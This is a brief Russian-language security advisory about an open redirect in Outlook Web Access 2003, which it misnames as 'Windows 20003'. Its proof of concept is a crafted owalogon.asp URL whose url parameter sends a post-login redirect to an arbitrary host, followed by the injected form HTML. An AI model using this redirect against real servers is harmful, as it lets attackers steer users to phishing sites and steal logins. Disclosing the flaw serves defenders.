Уязвимость в Microsoft Windows 20003 Outlook Web Access
позволяет нападающему перенаправить логин
на любой URL по своему желанию.

Proof of Concept:

1. https://[owa-host]/exchweb/bin/auth/owalogon.asp?url=http://[otherhost]
2. Click "login"
3. After the injection into the form, the source reveals:
< BODY scroll="AUTO" bgColor="#3D5FA3" text="#000000"
leftMargin=0 topMargin=0>
< FORM action="/exchweb/bin/auth/owaauth.dll" method="POST"
name="logonForm" autocomplete="off">
< INPUT type="hidden" name="destination" value="http://[otherhost]">
< INPUT type="hidden" name="flags" value="0">
< TABLE id="borderTable" class="standardTable"
cellSpacing=0 cellPadding=0 height="100%" width="100%"
bgColor="#3D5FA3" border=0>

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии